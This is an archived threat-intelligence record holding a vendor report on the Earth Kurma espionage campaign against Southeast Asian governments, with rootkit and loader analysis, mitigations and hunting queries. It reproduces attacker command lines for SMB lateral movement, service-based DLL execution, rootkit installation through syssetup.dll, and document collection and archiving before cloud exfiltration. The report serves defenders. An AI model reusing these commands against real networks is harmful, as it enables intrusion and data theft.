{
	"id": "4b3f1ed3-5d78-4c4d-a135-ac88ccda3243",
	"created_at": "2026-04-06T00:19:19.931072Z",
	"updated_at": "2026-04-10T03:33:16.339799Z",
	"deleted_at": null,
	"sha1_hash": "ec8f819146307c99d9a2abf00349ac9e4e30bba3",
	"title": "Earth Kurma APT Campaign Targets Southeast Asian Government Telecom Sectors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1691992,
	"plain_text": "Earth Kurma APT Campaign Targets Southeast Asian\r\nGovernment Telecom Sectors\r\nBy: Nick Dai, Sunny Lu Apr 25, 2025 Read time: 11 min (3023 words)\r\nPublished: 2025-04-25 · Archived: 2026-04-05 13:29:38 UTC\r\nSummary:\r\nTrend Research uncovered a sophisticated APT campaign targeting government and telecommunications\r\nsectors in Southeast Asia. Named Earth Kurma, the attackers use advanced custom malware, rootkits, and\r\ncloud storage services for data exfiltration. Earth Kurma demonstrates adaptive malware toolsets, strategic\r\ninfrastructure abuse, and complex evasion techniques.\r\nThis campaign poses a high business risk due to targeted espionage, credential theft, a persistent foothold\r\nestablished through kernel-level rootkits, and data exfiltration via trusted cloud platforms.\r\nOrganizations primarily in government and telecommunications sectors in Southeast Asia (particularly the\r\nPhilippines, Vietnam, Thailand, Malaysia) are affected. Organizations face potential compromise of\r\nsensitive government and telecommunications data, with attackers maintaining prolonged, undetected\r\naccess to their networks.\r\nTrend Vision One™ detects and blocks the malicious components used in the APT campaign. Trend Vision\r\nOne customers can also access hunting queries, threat insights, and threat intelligence reports to gain rich\r\ncontext and the latest updates on Earth Kurma.\r\nIntroduction\r\nSince June 2024, we have uncovered a sophisticated APT campaign targeting multiple countries in Southeast Asia,\r\nincluding the Philippines, Vietnam, and Malaysia. We have named the threat actors behind this campaign “Earth\r\nKurma.” Our analysis revealed that they primarily focused on government sectors, showing particular interest in\r\ndata exfiltration. 
Notably, this wave of attacks involved rootkits to maintain persistence and conceal their\r\nactivities.\r\nIn this research, we provide the intelligence on Earth Kurma and their ongoing activities. We’ll disclose technical\r\ndetails, including their tactics, techniques and procedures (TTPs), as well as specifics on their toolsets, such as\r\nTESDAT, SIMPOBOXSPY, KRNRAT, and MORIYA, among others.\r\nWho is Earth Kurma?\r\nEarth Kurma is a new APT group focused on countries in Southeast Asia. All of the identified victims belong to\r\ngovernment and government-related telecommunications sectors. From our long-term monitoring, their activities\r\ndate back to November 2020, with data exfiltration as their primary objective. Our analysis indicates that they\r\ntend to exfiltrate data over public cloud services, like Dropbox and OneDrive. To accomplish this, they used\r\nvarious customized toolsets including TESDAT and SIMPOBOXSPY. Earth Kurma also developed rootkits such\r\nas KRNRAT and MORIYA to hide their activities.\r\nhttps://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html\r\nPage 1 of 15\n\nAs for attribution, we found overlaps between Earth Kurma’s tools and those of other known APT groups. The\r\nMORIYA rootkits in this campaign share the same code base as the ones used in Operation TunnelSnake, while\r\nSIMPOBOXSPY and the exfiltration script link closely to another APT group called ToddyCat. However,\r\ndifferences in the attack patterns prevent us from conclusively attributing these campaigns and operations to the\r\nsame threat actors. Hence, we named this new APT group “Earth Kurma.”\r\nImpact\r\nOur telemetry shows that Earth Kurma targeted victims primarily in Southeast Asia, including the Philippines,\r\nVietnam, Thailand and Malaysia. Earth Kurma’s targets likely indicate cyberespionage as the motivation.\r\nFigure 1. 
The victimology distribution\r\nInfection Chain\r\nThe infection chain and malware used can be summarized as follows:\r\nFigure 2. The full infection flow of Earth Kurma’s attacks\r\nLateral Movement\r\nWe were unable to confirm the arrival vectors used in the attacks, as our analysis started years after the victims\r\nwere first compromised.\r\nMultiple tools were used in the lateral movement stage. Various utilities were used to scan the victims’\r\ninfrastructures and deploy malware, including NBTSCAN, LADON, FRPC, WMIHACKER and ICMPinger.\r\nThey also deployed a keylogger, KMLOG, to steal credentials from victims.\r\nTo survey the victims’ infrastructures, the threat actors used a tool named ICMPinger to scan the hosts. It is a\r\nsimple network scanning tool based on the ICMP protocol that tests whether the specified hosts are still alive. They delete\r\nthis tool once their operations conclude.\r\nFigure 3. The usage of ICMPinger, showing tasks being completed\r\nThey also used another open-source tool called Ladon to inspect the infrastructure. To bypass detection, Ladon is\r\nwrapped in a reflective loader compiled by PyInstaller. The XOR keys used to decode the payload differ among all\r\nthe samples we’ve collected.\r\nFigure 4. The reflective loading procedures for Ladon\r\nTo move laterally, they also used another open-source tool called WMIHACKER, which could execute\r\ncommands over port 135 without the need for SMB.\r\nFigure 5. 
The script body of WMIHACKER\r\nIn some of the cases we observed, they also executed commands over the SMB protocol (such as using “net use”)\r\nto inspect the infrastructure as well as deploy malware.\r\nC:\\Windows\\system32\\cmd.exe /C sc.exe -a 172.20.40.0-172.20.40.255 -t 500 -f lg.txt -c 1 -o 100 –n\r\nC:\\Windows\\system32\\cmd.exe /C net use \\\\172.20.40.41\\c$ {password} /u:{user}\r\nC:\\Windows\\system32\\cmd.exe /C copy vdmsc.dll \\\\172.20.40.41\\c$\\users\\{user} \\videos\r\nC:\\Windows\\system32\\cmd.exe /C copy msv.dat \\\\172.20.40.41\\c$\\windows\\system32\r\nC:\\Windows\\system32\\cmd.exe /C sc \\\\172.20.40.41 create katech binpath= \"cmd /c start /b rundll32.exe c:\\users\\\r\n{user}\\videos\\vdmsc.dll,Init\"\r\nC:\\Windows\\system32\\cmd.exe /C sc \\\\172.20.40.41 start katech\r\nC:\\Windows\\system32\\cmd.exe /C sc \\\\172.20.40.41 delete katech\r\nC:\\Windows\\system32\\cmd.exe /C net use \\\\172.20.40.41\\c$ /del /y\r\nThe threat actors also tried to steal credentials from the victims by using a custom tool called KMLOG. It’s a\r\nsimple keylogger that logs every keystroke to a file named\r\n“%Appdata%\\Roaming\\Microsoft\\Windows\\Libraries\\infokey.zip.”\r\nFigure 6. The keystroke logs\r\nTo hide the keystroke log file, it is prepended with a fake ZIP file header (PK header). What follows the header is\r\nthe real body of the logging content.\r\nTitle  Encryption  Data\r\nHeader  None  Predefined PK file header\r\n[Title]  XOR 0xDB  GetForegroundWindow title text\r\n[Time]  XOR 0xDB  GetLocalTime\r\n[Content]  XOR 0xDB  Keystrokes\r\nTable 1. The structure of the keystroke logging file\r\nPersistence\r\nIn the persistence stage, the actors deployed different loaders to maintain their foothold, including DUNLOADER,\r\nTESDAT and DMLOADER. These loaders are used to load payload files into memory and execute them. 
These\r\nloaders are then used to deploy more malware and exfiltrate data over public cloud services like Dropbox and\r\nOneDrive. In some cases, rootkits, including KRNRAT and MORIYA, were implanted by the loaders to bypass\r\nscanning.\r\nLoaders\r\nBetween 2022 and 2024, we observed multiple loaders implanted in victim environments, including\r\nDUNLOADER, TESDAT and DMLOADER. Most of the final payloads are Cobalt Strike beacons.\r\nThe first loader we encountered is DUNLOADER. It’s capable of loading the payload from either of the following\r\nlocations and decoding it with a one-byte XOR operation:\r\nFrom a file named “pdata.txt”\r\nFrom its own resource blob named “BIN”\r\nThis loader is a DLL file and always ensures that it’s executed by “rundll32.exe” by checking if the name of the\r\nparent process contains the specific string literal “und”. In most cases, this DLL should contain an export function\r\ncalled “Start.”\r\nFigure 7. The process name checking routine in DUNLOADER (top) and the shellcode invocation\r\nroutine in TESDAT (bottom)\r\nThe newer loader we later found is called TESDAT. It always loads a payload file with a “.dat” extension (like\r\n“mns.dat”). Instead of using common APIs like CreateThread to execute the decoded shellcode, it always calls an\r\nAPI called “SwitchToFiber,” which we think is an attempt to avoid detection. Our analysis showed two variants\r\nof TESDAT loaders. It can be either an EXE file or a DLL file with an export function called “Init.”\r\nWe also noticed that the actors would name the loaders with random strings and put them inside folders\r\nthat were often accessed by the victims instead of those commonly used by attackers (e.g., %ProgramData% or\r\n%Public%). This was presumably intended to blend the loaders with legitimate user files. 
Here are some filename\r\nexamples:\r\nC:\\Users\\{user}\\downloads\\wcrpc.dll\r\nC:\\Users\\{user}\\downloads\\mflpro\\acrg.dll\r\nC:\\Users\\{user}\\documents\\ViberDownloads\\mfsvc.dll\r\nC:\\Users\\{user}\\downloads\\fwdjustification\\dilx.exe\r\nC:\\Users\\{user}\\downloads\\ffap3560pcl6220510w636iml\\drasc.dll\r\nC:\\Users\\{user}\\downloads\\1\\2\\3\\prikc.exe\r\nC:\\Users\\{user}\\Downloads\\Rufus\\gpupdat.exe\r\nMore recently, we observed that a new loader, DMLOADER, was implanted. Instead of loading an additional payload\r\nfile, it loads the embedded payload and decodes it as an in-memory PE buffer. This loader usually has an export\r\nfunction called “DoMain” or “StartProtect.” The decoded PE payload should have an export function called\r\n“MThread.”\r\nRootkits\r\nAfter the loaders are implanted in the victim machines, we found rootkits installed on some compromised\r\nmachines. To install the rootkits, the threat actor abused a living-off-the-land binary called “syssetup.dll” and\r\ndropped an INF file to install them. An example of the command line used is as follows:\r\nC:\\Windows\\SysWOW64\\rundll32.exe syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\\users\\\r\n{user}\\downloads\\SmartFilter.inf\r\nThe first rootkit we observed is called MORIYA, which can hide the malicious payload in TCP traffic.\r\nMORIYA works as a TCP traffic interceptor. It monitors whether an incoming TCP packet is from the command-and-control (C\u0026C) server by checking its first six magic bytes. The magic bytes can be registered by issuing a\r\nspecific IOCTL code 0x222004 from its user-mode agent. If any packet is matched, it tries to inject the malicious\r\npayload into the body of the response packet. 
The variant we found works exactly the same as the one from this\r\nMORIYA report.\r\nFigure 8. The IOCTL code in MORIYA (top) and the working flow for MORIYA (bottom)\r\nThe MORIYA variant we found has an additional shellcode injection capability. At the end of its execution, it tries\r\nto load a payload file from the location “\\\\SystemRoot\\\\system32\\\\drivers\\\\{driver_name}.dat.” The payload will\r\nbe decrypted with AES and injected into the process svchost.exe. This payload should be its user-mode agent.\r\nFigure 9. The shellcode injection routine in MORIYA\r\nThe shellcode will eventually be invoked by using the API NtCreateThreadEx. To bypass detection, it tries to\r\ninvoke the call by directly using the syscall number. To get the valid syscall numbers on the targeted system, it\r\nenumerates NTDLL’s export functions, finds the ones with names starting with “Zw” or “Nt” and saves the\r\nsyscall number of each. This code snippet is reused from this post.\r\nFigure 10. The NTDLL enumeration routine in MORIYA\r\nThe other rootkit we found is called KRNRAT. It’s a full-featured backdoor with various capabilities, including\r\nprocess manipulation, file hiding, shellcode execution, traffic concealment, and C\u0026C communication. We named\r\nthis rootkit KRNRAT because of its internal name, as written in its PDB string:\r\nN:\\project\\li\\ThreeTools\\KrnRat\\code\\x64\\Debug\\SmartFilter.pdb\r\nOur analysis showed that KRNRAT is based upon multiple open-source projects:\r\nhttps://github.com/w1nds/ishellcode\r\nhttps://github.com/DarthTon/Blackbone\r\nhttps://github.com/XaFF-XaFF/Cronos-Rootkit\r\nhttps://github.com/JKornev/hidden\r\nhttps://github.com/amitschendel/venom-rootkit\r\nKRNRAT supports numerous IOCTL codes and capabilities. 
Its debug strings are also self-explanatory. Here’s the\r\nfull table of the supported IOCTL codes.\r\nIoControlCode  Description (Debug Strings)\r\n0x222000  IOCTL_TERMINATE_PROCESS\r\n0x22200C  IOCTL_SUSPEND_PROCESS\r\n0x222010  IOCTL_TERMINATE_PROCESS (misspelled; it should be IOCTL_RESUME_PROCESS)\r\n0x222014  IOCTL_ADD_BLACK_PROCESS\r\n0x222018  IOCTL_REMOVE_BLACK_PROCESS\r\n0x22201C  IOCTL_ADD_HIDDEN_FILE\r\n0x222020  IOCTL_ADD_HIDDEN_DIR\r\n0x222024  IOCTL_REMOVE_HIDDEN_FILE\r\n0x222040  IOCTL_REMOVE_HIDDEN_DIR\r\n0x222048  IOCTL_REMOVE_HIDDEN_PROCESS\r\n0x22204C  IOCTL_ADD_LOCAL_HIDDEN_PORT\r\n0x222050  IOCTL_REMOVE_LOCAL_HIDDEN_PORT\r\n0x222054  IOCTL_ADD_REMOTE_HIDDEN_PORT\r\n0x222058  IOCTL_REMOVE_REMOTE_HIDDEN_PORT\r\n0x22205C  IOCTL_REMOVE_LOCAL_HIDDEN_PORT\r\n0x222060  IOCTL_REMOVE_LOCAL_HIDDEN_IP\r\n0x222064  IOCTL_ADD_REMOTE_HIDDEN_IP\r\n0x222080  IOCTL_REMOVE_REMOTE_HIDDEN_IP\r\n0x222084  IOCTL_REMOVE_ALL_HIDDEN_NET\r\n0x222088  IOCTL_PROTECT_PROCESS\r\n0x22208C  IOCTL_ELEVATE_PROCESS\r\n0x222090  IOCTL_INJECT_SHELLCODE\r\nTable 2. The command codes supported in KRNRAT\r\nAt the end of its execution, it also loads the additional payload file and injects it into the svchost.exe process. This\r\nshellcode injection capability works exactly the same as in the MORIYA variant we found. This time, we were able\r\nto collect the payload, which turns out to be the user-mode agent for KRNRAT and is the backdoor. This means\r\nthat its user-mode agent is always memory-resident.\r\nThe backdoor is a stager. It connects to the C\u0026C server and downloads the next-stage payload. It tries to hide\r\nits process and connections by issuing the specific IOCTL codes to the KRNRAT rootkit.\r\nFigure 11. 
How the backdoor used KRNRAT to hide its process\r\nFigure 12. How the backdoor used KRNRAT to hide outbound IPs\r\nOffset  Size  Name  Description\r\n0x0  0x8  minutes  The sleep minutes\r\n0x8  0x4  hourStart  The hour that the current time is after\r\n0xC  0x4  hourEnd  The hour that the current time is before\r\n0x10  0x4  reserved\r\n0x14  0x4  dayOfWeekStart  The day of week that the current time is after\r\n0x18  0x4  dayOfWeekEnd  The day of week that the current time is before\r\nTable 3. The structure of the backdoor’s configuration in the registry\r\nThe final payload from the C\u0026C server would be the so-called SManager.\r\nFigure 13. The SManager’s export function “GetPluginInformation”\r\nCollection and Exfiltration\r\nIn the collection and exfiltration stage, we observed two customized tools used to exfiltrate specific documents to\r\nthe attacker’s cloud services, such as Dropbox and OneDrive. Before exfiltrating the files, several commands\r\nexecuted by the loader TESDAT collected specific document files with the following extensions: .pdf, .doc, .docx,\r\n.xls, .xlsx, .ppt, and .pptx. 
The documents are first placed into a newly created folder named \"tmp,\" which is then\r\narchived using WinRAR with a specific password.\r\nC:\\Windows\\system32\\cmd.exe /C dir c:\\users\r\nC:\\Windows\\system32\\cmd.exe /C mkdir tmp\r\nC:\\Windows\\system32\\cmd.exe /C powershell.exe \"dir c:\\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx',\r\n'*.xls', '*.xlsx', '*.ppt' , '*.pptx'| where LastWriteTime -gt (Get-date).AddDays(-30) | foreach {cmd /c copy $_ /y\r\nc:\\users\\{username}\\documents\\tmp};echo Finish!\"\r\nC:\\Windows\\system32\\cmd.exe /C c:\\\"program files\"\\winrar\\rar.exe a -p{password} -v200m c:\\users\\\r\n{username}\\documents\\{hostname} c:\\users\\{username}\\documents\\tmp -ep\r\nC:\\Windows\\system32\\cmd.exe /C rmdir /s /q tmp\r\nThe first tool, SIMPOBOXSPY, is an exfiltration tool that can upload the archive files to Dropbox with a specified\r\naccess token. This tool is exactly the “generic DropBox uploader” mentioned in this ToddyCat report. The\r\ncommand argument of SIMPOBOXSPY is shown below.\r\ndilx.exe {access_token} [-f {file_1} {file_2} ...]\r\nIf the argument “-f” is not specified, it will upload the files in the current folder with predefined extensions such as\r\n“.z”, “.001”, “.002”, ..., “.128”. There is also another variant, which will upload the archive with the extension “.7z”.\r\nAfter uploading the files to Dropbox, a folder named with the current date and time will be created on Dropbox.\r\nFigure 14. The SIMPOBOXSPY’s stdout\r\nThe other tool, ODRIZ, is an older tool found in 2023. It uploads the collected files to OneDrive using a specified\r\nOneDrive refresh token. The command argument is shown below. It uploads the files in the current folder\r\nthat match the pattern “*.z.*”.\r\nodriz.exe {refresh_token}\r\nFigure 15. 
The usage of ODRIZ (top) and the code in ODRIZ (bottom)\r\nThe process of file collection and exfiltration is shown in the following:\r\nFigure 16. The exfiltration flow\r\nAfter collecting all the files into a password-protected archive, which is normally named after the host name, the\r\narchived RAR will be copied to the folder \\\\DC_server\\sysvol\\{domain}\\Policies\\{ID}\\user\\ via the SMB protocol.\r\nThe folder “sysvol” contains all of the AD policies and information, and this folder only exists on DC servers. We\r\nbelieve that the attackers move all the collected archives into the folder “sysvol” to utilize a native Windows\r\nmechanism called Distributed File System Replication (DFSR). It is a Windows feature that synchronizes AD\r\npolicies across DC servers by replicating the contents of the “sysvol” folder among them. With this, the stolen\r\narchives can be automatically synchronized to all DC servers, enabling exfiltration through any one of them.\r\nAttribution\r\nOur analysis identified weak links to two groups, ToddyCat and Operation TunnelSnake. After a thorough\r\nexamination, we determined that this campaign merited a separate designation, Earth Kurma.\r\nThe APT group ToddyCat was first disclosed in 2022. The “tailored loader,” mentioned in this ToddyCat report,\r\nwas also found in the same victim machines infected by the TESDAT loaders. However, we did not find any\r\nprocess execution logs linking these loaders. Also, they share similar exfiltration PowerShell scripts. The tool\r\nSIMPOBOXSPY used by Earth Kurma was also used by ToddyCat before.\r\nBoth Earth Kurma and ToddyCat heavily targeted Southeast Asian countries. Reports on ToddyCat indicate that\r\nits activities started in 2020. 
The timeline of their activities aligns closely with what we observed in Earth Kurma.\r\nHowever, SIMPOBOXSPY is a simple tool that could be shared among groups, and we did not observe other\r\nexclusive tools that can be directly attributed to ToddyCat. Thus, we cannot conclusively link Earth Kurma to\r\nToddyCat.\r\nThe second potentially related APT group is Operation TunnelSnake, which was reported in 2021. In the\r\nreport they used MORIYA, which uses the same code base as the MORIYA variant we found. Additionally,\r\nOperation TunnelSnake targeted countries in Southeast Asia. Nevertheless, we didn’t observe any similarity in the\r\npost-exploitation stages.\r\nSecurity best practices\r\nEarth Kurma remains highly active, continuing to target countries around Southeast Asia. They have the capability\r\nto adapt to victim environments and maintain a stealthy presence. They can also reuse the same code base from\r\npreviously identified campaigns to customize their toolsets, sometimes even utilizing the victim’s infrastructure to\r\nachieve their goals.\r\nHere are some best security practices to mitigate such threats:\r\nEnforce strict driver installation policies. Allow only digitally signed and explicitly approved drivers\r\nthrough Group Policies or application control solutions to prevent malicious rootkits.\r\nStrengthen Active Directory (AD) and DFSR controls. Secure AD’s sysvol directory and closely audit\r\nDFSR replication events to prevent misuse for stealthy data exfiltration.\r\nLimit SMB communications. Restrict SMB protocol usage across the network to prevent lateral movement\r\nand unauthorized file transfers.\r\nProactive security with Trend Vision One™\r\nTrend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure\r\nmanagement, security operations, and robust layered protection. 
This comprehensive approach helps you predict and prevent threats, accelerating proactive security outcomes across your entire digital estate. Backed by decades\r\nof cybersecurity leadership and Trend Cybertron, the industry's first proactive cybersecurity AI, it delivers proven\r\nresults: a 92% reduction in ransomware risk and a 99% reduction in detection time. Security leaders can\r\nbenchmark their posture and showcase continuous improvement to stakeholders. With Trend Vision One, you’re\r\nenabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner\r\nfor innovation.\r\nTrend Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and\r\nThreat Insights. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them to\r\nprepare for emerging threats by offering comprehensive information on threat actors, their malicious activities,\r\nand their techniques. By leveraging this intelligence, customers can take proactive steps to protect their\r\nenvironments, mitigate risks, and effectively respond to threats.\r\nTrend Vision One Intelligence Reports App [IOC Sweeping]\r\nEarth Kurma Uncovered: Cyber Threats to Southeast Asian Governments\r\nTrend Vision One Threat Insights App\r\nThreat Actors: Earth Kurma\r\nEmerging Threats: Earth Kurma Uncovered: Cyber Threats to Southeast Asian Governments\r\nHunting Queries\r\nTrend Vision One Search App\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment.
\r\nScan for the Earth Kurma malware detections:\r\nmalName: (*DUNLOADER* OR *TESDAT* OR *DMLOADER* OR *MORIYA* OR *KRNRAT* OR\r\n*SIMPOBOXSPY* OR *ODRIZ* OR *KMLOG*) AND eventName: MALWARE_DETECTION\r\nIndicators of Compromise (IoC)\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/25/d/earth-kurma-apt-campaign.html"
	],
	"report_names": [
		"earth-kurma-apt-campaign.html"
	],
	"threat_actors": [
		{
			"id": "7c390b96-8206-4194-81d8-ebbabb9910ff",
			"created_at": "2023-12-03T02:00:05.147496Z",
			"updated_at": "2026-04-10T02:00:03.486417Z",
			"deleted_at": null,
			"main_name": "TunnelSnake",
			"aliases": [],
			"source_name": "MISPGALAXY:TunnelSnake",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4b48e4b6-09b0-4f4d-a78c-6b455d122e67",
			"created_at": "2022-10-25T16:07:24.020115Z",
			"updated_at": "2026-04-10T02:00:04.84333Z",
			"deleted_at": null,
			"main_name": "Operation TunnelSnake",
			"aliases": [],
			"source_name": "ETDA:Operation TunnelSnake",
			"tools": [
				"Moriya"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "222835b0-22fb-406e-8fd5-f36dae694212",
			"created_at": "2025-06-29T02:01:56.985922Z",
			"updated_at": "2026-04-10T02:00:04.666399Z",
			"deleted_at": null,
			"main_name": "Earth Kurma",
			"aliases": [],
			"source_name": "ETDA:Earth Kurma",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"DMLOADER",
				"DUNLOADER",
				"KRNRAT",
				"Moriya",
				"ODRIZ",
				"SIMPOBOXSPY",
				"TESDAT",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d67df52c-a901-4d55-b287-321818500789",
			"created_at": "2024-04-24T02:00:49.591518Z",
			"updated_at": "2026-04-10T02:00:05.314272Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"ToddyCat"
			],
			"source_name": "MITRE:ToddyCat",
			"tools": [
				"Cobalt Strike",
				"LoFiSe",
				"China Chopper",
				"netstat",
				"Pcexter",
				"Samurai"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5",
			"created_at": "2022-10-25T16:07:24.329539Z",
			"updated_at": "2026-04-10T02:00:04.939013Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Operation Stayin’ Alive",
				"Storm-0247"
			],
			"source_name": "ETDA:ToddyCat",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"Cuthead",
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"Krong",
				"LoFiSe",
				"Ngrok",
				"PcExter",
				"PsExec",
				"SIMPOBOXSPY",
				"Samurai",
				"SinoChopper",
				"SoftEther VPN",
				"TomBerBil",
				"WAExp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f161dc2b-a18e-43b9-9786-2285bc745a10",
			"created_at": "2025-05-29T02:00:03.214326Z",
			"updated_at": "2026-04-10T02:00:03.867482Z",
			"deleted_at": null,
			"main_name": "Earth Kurma",
			"aliases": [],
			"source_name": "MISPGALAXY:Earth Kurma",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
			"created_at": "2023-01-06T13:46:39.378701Z",
			"updated_at": "2026-04-10T02:00:03.307846Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Websiic"
			],
			"source_name": "MISPGALAXY:ToddyCat",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434759,
	"ts_updated_at": 1775791996,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ec8f819146307c99d9a2abf00349ac9e4e30bba3.pdf",
		"text": "https://archive.orkl.eu/ec8f819146307c99d9a2abf00349ac9e4e30bba3.txt",
		"img": "https://archive.orkl.eu/ec8f819146307c99d9a2abf00349ac9e4e30bba3.jpg"
	}
}